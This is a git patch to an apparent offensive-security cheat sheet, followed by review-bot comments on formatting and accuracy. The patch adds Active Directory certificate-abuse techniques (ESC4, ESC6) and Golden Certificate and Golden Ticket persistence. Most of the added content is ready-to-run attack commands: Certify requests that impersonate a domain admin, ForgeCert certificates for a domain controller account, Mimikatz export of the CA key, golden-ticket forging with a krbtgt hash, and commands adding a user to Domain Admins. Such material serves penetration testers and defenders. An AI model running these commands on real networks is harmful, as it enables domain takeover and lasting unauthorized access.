From b5df6e1447596cb675a6c8c5351d546c1d531a83 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 1 Jan 2022 20:42:58 +0100 Subject: [PATCH] ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 + Golden Certificate --- .../Active Directory Attack.md | 37 ++++++++++--- .../Windows - Persistence.md | 52 +++++++++++++++++++ 2 files changed, 83 insertions(+), 6 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 474dff3..b0600c7 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -76,6 +76,7 @@ - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates) - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates) - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities) + * [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2) - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) @@ -2182,7 +2183,8 @@ secretsdump.py -k -no-pass target.lab.local ### Active Directory Certificate Services -Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs` +* Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs` +* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping` #### ESC1 - Misconfigured Certificate Templates 
@@ -2197,6 +2199,7 @@ Exploitation: * Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates ```ps1 Certify.exe find /vulnerable + Certify.exe find /vulnerable /currentuser or PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local' ``` @@ -2223,7 +2226,7 @@ Exploitation: #### ESC2 - Misconfigured Certificate Templates Requirements: -* Allows requesters to specify a SAN in the CSR as well as allows Any Purpose EKU (2.5.29.37.0) +* Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0) Exploitation: * Find template @@ -2235,6 +2238,8 @@ Exploitation: #### ESC4 - Access Control Vulnerabilities +> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability + * Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl 
@@ -2242,12 +2247,32 @@ Exploitation: * Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1 ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag + + # Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. + C:\>StandIn.exe --adcs --filter WebServer --ess --add ``` * Perform ESC1 and then restore the value ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag ``` +#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 + +> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name. + +Exploitation: +* Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag. + ```ps1 + Certify.exe cas + ``` +* Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names + ```ps1 + .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin + ``` + +Mitigation: +* Remove the flag : `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2` + #### ESC8 - AD CS Relay Attack 
@@ -2363,13 +2388,13 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr #### GenericAll * **GenericAll on User** : We can reset user's password without knowing the current password -* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : - * On Windows : `net group "domain admins" spotless /add /domain` +* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user hacker) to the Domain Admin group : + * On Windows : `net group "domain admins" hacker /add /domain` * On Linux: * using the Samba software suite : - `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'AttackerUser%MyPassword' -W DOMAIN -I [DC IP]` + `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'hacker%MyPassword123' -W DOMAIN -I [DC IP]` * using bloodyAD: - `bloodyAD.py --host [DC IP] -d DOMAIN -u AttackerUser -p MyPassword addObjectToGroup UserToAdd 'GROUP NAME'` + `bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'` * **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it. ```powershell diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 916f67e..3c5252c 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -29,6 +29,9 @@ * [sethc.exe](#sethc.exe) * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing) * [Skeleton Key](#skeleton-key) +* [Domain](#domain) + * [Golden Certificate](#golden-certificate) + * [Golden Ticket](#golden-ticket) * [References](#references) 
@@ -381,6 +384,54 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName -Credential \Administrator ``` +## Domain + +### User Certificate + +```ps1 +# Request a certificate for the User template +.\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:User + +# Convert the certificate for Rubeus +openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx + +# Request a TGT using the certificate +.\Rubeus.exe asktgt /user:username /certificate:C:\Temp\cert.pfx /password:Passw0rd123! +``` + +### Golden Certificate + +> Require elevated privileges in the Active Directory, or on the ADCS machine + +* Export CA as p12 file: `certsrv.msc` > `Right Click` > `Back up CA...` +* Alternative 1: Using Mimikatz you can extract the certificate as PFX/DER + ```ps1 + privilege::debug + crypto::capi + crypto::cng + crypto::certificates /systemstore:local_machine /store:my /export + ``` +* Alternative 2: Using SharpDPAPI, then convert the certificate: `openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx` +* [ForgeCert](https://github.com/GhostPack/ForgeCert) - Forge a certificate for any active domain user using the CA certificate + ```ps1 + ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName harry@lab.local --NewCertPath harry.pfx --NewCertPassword Password123 + ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName DC$@lab.local --NewCertPath dc.pfx --NewCertPassword Password123 + ``` +* Finally you can request a TGT using the Certificate + ```ps1 + Rubeus.exe asktgt /user:ron /certificate:harry.pfx /password:Password123 + ``` + +### Golden Ticket + +> Forge a Golden ticket using Mimikatz + +```ps1 +kerberos::purge +kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e 
/ticket:evil.tck /ptt +kerberos::tgt +``` + ## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) @@ -393,3 +444,4 @@ Enter-PSSession -ComputerName -Credential \Administr * [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/) * [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) * [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) +* [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)
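Review bot: In the first hunk of `Active Directory Attack.md` (the table of contents at `@@ -76,6 +76,7 @@`) the new entry uses a `*` bullet while the sibling ESC1/ESC2/ESC4/ESC8 entries use `-`, and the link text has a trailing space before the `]` (`[ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ]`). Suggest `- [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2](#esc6---editf_attributesubjectaltname2)` so the rendered list is uniform and the anchor matches the heading added later in the patch.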
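Review bot: Missing documentation in the hunk at `@@ -2197,6 +2199,7 @@`: the added `Certify.exe find /vulnerable /currentuser` line sits directly under `Certify.exe find /vulnerable` with nothing explaining how the two differ, so a reader cannot tell when to use the `/currentuser` form. Suggest a one-line `#` comment above the new line stating what `/currentuser` restricts the search to, in the same style as the `# Add/remove ...` comment used for StandIn further down.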
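Review bot: The new blockquote in the ESC4 hunk (`@@ -2235,6 +2238,8 @@`) is inaccurate and has grammar and quoting problems: `mspki-certificate-name-flag` is the template attribute, not the flag, and the thing being enabled is the `ENROLLEE_SUPPLIES_SUBJECT` bit inside it (exactly what the `-add enrollee_supplies_subject -property mspki-Certificate-Name-Flag` command in the next hunk does); "allow attackers" should be "allows attackers", and the opening `"` before `push a misconfiguration` is never closed. Suggest: `> Setting the ENROLLEE_SUPPLIES_SUBJECT bit in mspki-certificate-name-flag on a template that allows domain authentication lets an attacker "push a misconfiguration to a template", leading to an ESC1 vulnerability.`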
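Review bot: In the hunk at `@@ -2242,12 +2247,32 @@`, the added StandIn line is inconsistent with its own comment and with the surrounding block: the comment says `Add/remove ENROLLEE_SUPPLIES_SUBJECT flag` but only the `--add` form is shown, and the `C:\>` prompt prefix is mixed into a `ps1` block whose other lines (`python3 modifyCertTemplate.py ...`) carry no prompt. Suggest dropping the `C:\>` prefix and either showing both variants or rewording the comment to "Add the ENROLLEE_SUPPLIES_SUBJECT flag". In the new ESC6 section, the Mitigation line `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2` should also note that the CA service (`certsvc`) must be restarted for the EditFlags change to take effect, otherwise an administrator may apply the fix and still see `UserSpecifiedSAN` enabled when re-checking with `Certify.exe cas`.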
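Review bot: The table-of-contents hunk in `Windows - Persistence.md` (`@@ -29,6 +29,9 @@`) is incomplete: it adds `Domain`, `Golden Certificate` and `Golden Ticket`, but the body hunk also introduces a `### User Certificate` heading under `## Domain` that has no TOC entry. Suggest adding `  * [User Certificate](#user-certificate)` between the `Domain` and `Golden Certificate` entries so the TOC matches the headings.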
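Review bot: The Golden Certificate example in the hunk at `@@ -381,6 +384,54 @@` is internally inconsistent: the two `ForgeCert.exe` lines produce `harry.pfx` with `--SubjectAltName harry@lab.local` and `dc.pfx` with `DC$@lab.local`, but the final step runs `Rubeus.exe asktgt /user:ron /certificate:harry.pfx`, naming an account (`ron`) that appears nowhere in the forged certificate. Use the same account in both lines (e.g. `/user:harry /certificate:harry.pfx`) so the example is coherent. Minor: the blockquote `> Require elevated privileges in the Active Directory, or on the ADCS machine` should read "Requires elevated privileges in Active Directory, or on the ADCS machine".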
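Review bot: Style point on the References hunk (`@@ -393,3 +444,4 @@`): the added entry `[Golden Certificate - NOVEMBER 15, 2021](...)` uses an all-caps date where every neighbouring entry follows the `Title - @author` pattern (e.g. `Persistence – Registry Run Keys - @netbiosX`). Suggest `[Golden Certificate - @netbiosX](https://pentestlab.blog/2021/11/15/golden-certificate/)` to match the existing pentestlab.blog entries in the same list.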